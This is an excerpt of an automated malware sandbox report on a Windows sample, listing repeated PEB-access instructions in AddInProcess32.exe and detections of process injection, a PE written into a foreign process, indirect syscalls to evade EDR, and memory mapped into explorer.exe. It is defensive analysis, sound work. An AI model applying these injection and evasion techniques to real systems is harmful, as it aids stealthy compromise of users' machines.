          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017F8620 mov eax, dword ptr fs:[00000030h]3_2_017F8620
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017F6620 mov eax, dword ptr fs:[00000030h]3_2_017F6620
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0183E6F2 mov eax, dword ptr fs:[00000030h]3_2_0183E6F2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0183E6F2 mov eax, dword ptr fs:[00000030h]3_2_0183E6F2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0183E6F2 mov eax, dword ptr fs:[00000030h]3_2_0183E6F2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0183E6F2 mov eax, dword ptr fs:[00000030h]3_2_0183E6F2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018406F1 mov eax, dword ptr fs:[00000030h]3_2_018406F1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018406F1 mov eax, dword ptr fs:[00000030h]3_2_018406F1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D260B mov eax, dword ptr fs:[00000030h]3_2_017D260B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D260B mov eax, dword ptr fs:[00000030h]3_2_017D260B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D260B mov eax, dword ptr fs:[00000030h]3_2_017D260B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D260B mov eax, dword ptr fs:[00000030h]3_2_017D260B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D260B mov eax, dword ptr fs:[00000030h]3_2_017D260B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D260B mov eax, dword ptr fs:[00000030h]3_2_017D260B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D260B mov eax, dword ptr fs:[00000030h]3_2_017D260B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0183E609 mov eax, dword ptr fs:[00000030h]3_2_0183E609
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01802619 mov eax, dword ptr fs:[00000030h]3_2_01802619
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FA6C7 mov ebx, dword ptr fs:[00000030h]3_2_017FA6C7
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FA6C7 mov eax, dword ptr fs:[00000030h]3_2_017FA6C7
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017F66B0 mov eax, dword ptr fs:[00000030h]3_2_017F66B0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FC6A6 mov eax, dword ptr fs:[00000030h]3_2_017FC6A6
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0188866E mov eax, dword ptr fs:[00000030h]3_2_0188866E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0188866E mov eax, dword ptr fs:[00000030h]3_2_0188866E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C4690 mov eax, dword ptr fs:[00000030h]3_2_017C4690
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C4690 mov eax, dword ptr fs:[00000030h]3_2_017C4690
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017E6962 mov eax, dword ptr fs:[00000030h]3_2_017E6962
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017E6962 mov eax, dword ptr fs:[00000030h]3_2_017E6962
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017E6962 mov eax, dword ptr fs:[00000030h]3_2_017E6962
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018489B3 mov esi, dword ptr fs:[00000030h]3_2_018489B3
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018489B3 mov eax, dword ptr fs:[00000030h]3_2_018489B3
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018489B3 mov eax, dword ptr fs:[00000030h]3_2_018489B3
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_018569C0 mov eax, dword ptr fs:[00000030h]3_2_018569C0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0188A9D3 mov eax, dword ptr fs:[00000030h]3_2_0188A9D3
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017B8918 mov eax, dword ptr fs:[00000030h]3_2_017B8918
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017B8918 mov eax, dword ptr fs:[00000030h]3_2_017B8918
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0184E9E0 mov eax, dword ptr fs:[00000030h]3_2_0184E9E0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017F29F9 mov eax, dword ptr fs:[00000030h]3_2_017F29F9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017F29F9 mov eax, dword ptr fs:[00000030h]3_2_017F29F9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0183E908 mov eax, dword ptr fs:[00000030h]3_2_0183E908
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0183E908 mov eax, dword ptr fs:[00000030h]3_2_0183E908
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0184C912 mov eax, dword ptr fs:[00000030h]3_2_0184C912
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017CA9D0 mov eax, dword ptr fs:[00000030h]3_2_017CA9D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017CA9D0 mov eax, dword ptr fs:[00000030h]3_2_017CA9D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017CA9D0 mov eax, dword ptr fs:[00000030h]3_2_017CA9D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017CA9D0 mov eax, dword ptr fs:[00000030h]3_2_017CA9D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017CA9D0 mov eax, dword ptr fs:[00000030h]3_2_017CA9D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017CA9D0 mov eax, dword ptr fs:[00000030h]3_2_017CA9D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0184892A mov eax, dword ptr fs:[00000030h]3_2_0184892A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0185892B mov eax, dword ptr fs:[00000030h]3_2_0185892B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017F49D0 mov eax, dword ptr fs:[00000030h]3_2_017F49D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01840946 mov eax, dword ptr fs:[00000030h]3_2_01840946
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C09AD mov eax, dword ptr fs:[00000030h]3_2_017C09AD
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C09AD mov eax, dword ptr fs:[00000030h]3_2_017C09AD
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D29A0 mov eax, dword ptr fs:[00000030h]3_2_017D29A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D29A0 mov eax, dword ptr fs:[00000030h]3_2_017D29A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D29A0 mov eax, dword ptr fs:[00000030h]3_2_017D29A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D29A0 mov eax, dword ptr fs:[00000030h]3_2_017D29A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D29A0 mov eax, dword ptr fs:[00000030h]3_2_017D29A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D29A0 mov eax, dword ptr fs:[00000030h]3_2_017D29A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D29A0 mov eax, dword ptr fs:[00000030h]3_2_017D29A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D29A0 mov eax, dword ptr fs:[00000030h]3_2_017D29A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D29A0 mov eax, dword ptr fs:[00000030h]3_2_017D29A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D29A0 mov eax, dword ptr fs:[00000030h]3_2_017D29A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D29A0 mov eax, dword ptr fs:[00000030h]3_2_017D29A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D29A0 mov eax, dword ptr fs:[00000030h]3_2_017D29A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D29A0 mov eax, dword ptr fs:[00000030h]3_2_017D29A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0180096E mov eax, dword ptr fs:[00000030h]3_2_0180096E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0180096E mov edx, dword ptr fs:[00000030h]3_2_0180096E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0180096E mov eax, dword ptr fs:[00000030h]3_2_0180096E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0184C97C mov eax, dword ptr fs:[00000030h]3_2_0184C97C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01864978 mov eax, dword ptr fs:[00000030h]3_2_01864978
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01864978 mov eax, dword ptr fs:[00000030h]3_2_01864978
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0184C89D mov eax, dword ptr fs:[00000030h]3_2_0184C89D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C4859 mov eax, dword ptr fs:[00000030h]3_2_017C4859
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C4859 mov eax, dword ptr fs:[00000030h]3_2_017C4859
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017F0854 mov eax, dword ptr fs:[00000030h]3_2_017F0854
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D2840 mov ecx, dword ptr fs:[00000030h]3_2_017D2840
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017E2835 mov eax, dword ptr fs:[00000030h]3_2_017E2835
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017E2835 mov eax, dword ptr fs:[00000030h]3_2_017E2835
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017E2835 mov eax, dword ptr fs:[00000030h]3_2_017E2835
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017E2835 mov ecx, dword ptr fs:[00000030h]3_2_017E2835
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017E2835 mov eax, dword ptr fs:[00000030h]3_2_017E2835
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017E2835 mov eax, dword ptr fs:[00000030h]3_2_017E2835
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FA830 mov eax, dword ptr fs:[00000030h]3_2_017FA830
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0188A8E4 mov eax, dword ptr fs:[00000030h]3_2_0188A8E4
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FC8F9 mov eax, dword ptr fs:[00000030h]3_2_017FC8F9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FC8F9 mov eax, dword ptr fs:[00000030h]3_2_017FC8F9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0184C810 mov eax, dword ptr fs:[00000030h]3_2_0184C810
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0186483A mov eax, dword ptr fs:[00000030h]3_2_0186483A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0186483A mov eax, dword ptr fs:[00000030h]3_2_0186483A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017EE8C0 mov eax, dword ptr fs:[00000030h]3_2_017EE8C0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01856870 mov eax, dword ptr fs:[00000030h]3_2_01856870
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01856870 mov eax, dword ptr fs:[00000030h]3_2_01856870
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0184E872 mov eax, dword ptr fs:[00000030h]3_2_0184E872
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0184E872 mov eax, dword ptr fs:[00000030h]3_2_0184E872
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C0887 mov eax, dword ptr fs:[00000030h]3_2_017C0887
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017BCB7E mov eax, dword ptr fs:[00000030h]3_2_017BCB7E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01874BB0 mov eax, dword ptr fs:[00000030h]3_2_01874BB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01874BB0 mov eax, dword ptr fs:[00000030h]3_2_01874BB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0186EBD0 mov eax, dword ptr fs:[00000030h]3_2_0186EBD0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017EEB20 mov eax, dword ptr fs:[00000030h]3_2_017EEB20
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017EEB20 mov eax, dword ptr fs:[00000030h]3_2_017EEB20
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0184CBF0 mov eax, dword ptr fs:[00000030h]3_2_0184CBF0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017EEBFC mov eax, dword ptr fs:[00000030h]3_2_017EEBFC
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C8BF0 mov eax, dword ptr fs:[00000030h]3_2_017C8BF0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C8BF0 mov eax, dword ptr fs:[00000030h]3_2_017C8BF0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C8BF0 mov eax, dword ptr fs:[00000030h]3_2_017C8BF0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0183EB1D mov eax, dword ptr fs:[00000030h]3_2_0183EB1D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0183EB1D mov eax, dword ptr fs:[00000030h]3_2_0183EB1D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0183EB1D mov eax, dword ptr fs:[00000030h]3_2_0183EB1D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0183EB1D mov eax, dword ptr fs:[00000030h]3_2_0183EB1D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0183EB1D mov eax, dword ptr fs:[00000030h]3_2_0183EB1D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0183EB1D mov eax, dword ptr fs:[00000030h]3_2_0183EB1D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0183EB1D mov eax, dword ptr fs:[00000030h]3_2_0183EB1D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0183EB1D mov eax, dword ptr fs:[00000030h]3_2_0183EB1D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0183EB1D mov eax, dword ptr fs:[00000030h]3_2_0183EB1D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01888B28 mov eax, dword ptr fs:[00000030h]3_2_01888B28
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01888B28 mov eax, dword ptr fs:[00000030h]3_2_01888B28
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C0BCD mov eax, dword ptr fs:[00000030h]3_2_017C0BCD
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C0BCD mov eax, dword ptr fs:[00000030h]3_2_017C0BCD
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C0BCD mov eax, dword ptr fs:[00000030h]3_2_017C0BCD
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017E0BCB mov eax, dword ptr fs:[00000030h]3_2_017E0BCB
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017E0BCB mov eax, dword ptr fs:[00000030h]3_2_017E0BCB
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017E0BCB mov eax, dword ptr fs:[00000030h]3_2_017E0BCB
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D0BBE mov eax, dword ptr fs:[00000030h]3_2_017D0BBE
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D0BBE mov eax, dword ptr fs:[00000030h]3_2_017D0BBE
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01868B42 mov eax, dword ptr fs:[00000030h]3_2_01868B42
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01856B40 mov eax, dword ptr fs:[00000030h]3_2_01856B40
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01856B40 mov eax, dword ptr fs:[00000030h]3_2_01856B40
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0188AB40 mov eax, dword ptr fs:[00000030h]3_2_0188AB40
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01874B4B mov eax, dword ptr fs:[00000030h]3_2_01874B4B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01874B4B mov eax, dword ptr fs:[00000030h]3_2_01874B4B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0186EB50 mov eax, dword ptr fs:[00000030h]3_2_0186EB50
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01894A80 mov eax, dword ptr fs:[00000030h]3_2_01894A80
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FCA6F mov eax, dword ptr fs:[00000030h]3_2_017FCA6F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FCA6F mov eax, dword ptr fs:[00000030h]3_2_017FCA6F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FCA6F mov eax, dword ptr fs:[00000030h]3_2_017FCA6F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01816AA4 mov eax, dword ptr fs:[00000030h]3_2_01816AA4
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D0A5B mov eax, dword ptr fs:[00000030h]3_2_017D0A5B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017D0A5B mov eax, dword ptr fs:[00000030h]3_2_017D0A5B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C6A50 mov eax, dword ptr fs:[00000030h]3_2_017C6A50
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C6A50 mov eax, dword ptr fs:[00000030h]3_2_017C6A50
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C6A50 mov eax, dword ptr fs:[00000030h]3_2_017C6A50
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C6A50 mov eax, dword ptr fs:[00000030h]3_2_017C6A50
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C6A50 mov eax, dword ptr fs:[00000030h]3_2_017C6A50
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C6A50 mov eax, dword ptr fs:[00000030h]3_2_017C6A50
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C6A50 mov eax, dword ptr fs:[00000030h]3_2_017C6A50
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FCA38 mov eax, dword ptr fs:[00000030h]3_2_017FCA38
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017E4A35 mov eax, dword ptr fs:[00000030h]3_2_017E4A35
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017E4A35 mov eax, dword ptr fs:[00000030h]3_2_017E4A35
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01816ACC mov eax, dword ptr fs:[00000030h]3_2_01816ACC
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01816ACC mov eax, dword ptr fs:[00000030h]3_2_01816ACC
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01816ACC mov eax, dword ptr fs:[00000030h]3_2_01816ACC
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017EEA2E mov eax, dword ptr fs:[00000030h]3_2_017EEA2E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FCA24 mov eax, dword ptr fs:[00000030h]3_2_017FCA24
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FAAEE mov eax, dword ptr fs:[00000030h]3_2_017FAAEE
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017FAAEE mov eax, dword ptr fs:[00000030h]3_2_017FAAEE
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0184CA11 mov eax, dword ptr fs:[00000030h]3_2_0184CA11
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C0AD0 mov eax, dword ptr fs:[00000030h]3_2_017C0AD0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017F4AD0 mov eax, dword ptr fs:[00000030h]3_2_017F4AD0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017F4AD0 mov eax, dword ptr fs:[00000030h]3_2_017F4AD0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C8AA0 mov eax, dword ptr fs:[00000030h]3_2_017C8AA0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C8AA0 mov eax, dword ptr fs:[00000030h]3_2_017C8AA0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0186EA60 mov eax, dword ptr fs:[00000030h]3_2_0186EA60
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017F8A90 mov edx, dword ptr fs:[00000030h]3_2_017F8A90
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0183CA72 mov eax, dword ptr fs:[00000030h]3_2_0183CA72
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0183CA72 mov eax, dword ptr fs:[00000030h]3_2_0183CA72
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017CEA80 mov eax, dword ptr fs:[00000030h]3_2_017CEA80
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017CEA80 mov eax, dword ptr fs:[00000030h]3_2_017CEA80
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017CEA80 mov eax, dword ptr fs:[00000030h]3_2_017CEA80
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017CEA80 mov eax, dword ptr fs:[00000030h]3_2_017CEA80
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017CEA80 mov eax, dword ptr fs:[00000030h]3_2_017CEA80
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017CEA80 mov eax, dword ptr fs:[00000030h]3_2_017CEA80
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017CEA80 mov eax, dword ptr fs:[00000030h]3_2_017CEA80
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017CEA80 mov eax, dword ptr fs:[00000030h]3_2_017CEA80
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017CEA80 mov eax, dword ptr fs:[00000030h]3_2_017CEA80
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01894DAD mov eax, dword ptr fs:[00000030h]3_2_01894DAD
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C8D59 mov eax, dword ptr fs:[00000030h]3_2_017C8D59
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C8D59 mov eax, dword ptr fs:[00000030h]3_2_017C8D59
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C8D59 mov eax, dword ptr fs:[00000030h]3_2_017C8D59
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C8D59 mov eax, dword ptr fs:[00000030h]3_2_017C8D59
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C8D59 mov eax, dword ptr fs:[00000030h]3_2_017C8D59
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C0D59 mov eax, dword ptr fs:[00000030h]3_2_017C0D59
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_001F5649 GetCurrentProcessId,OpenProcess,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetLastError,FreeLibrary,GetLastError,OpenEventW,SetEvent,CloseHandle,GetLastError,GetLastError,5_2_001F5649
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_001F7020 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_001F7020
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_001F71B0 SetUnhandledExceptionFilter,5_2_001F71B0
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Allocates memory in foreign processes
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeMemory allocated: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 protect: page execute and read and writeJump to behavior
          Found direct / indirect Syscall (likely to bypass EDR)
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeNtQueueApcThread: Indirect: 0x12DA4F2Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeNtClose: Indirect: 0x12DA56C
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
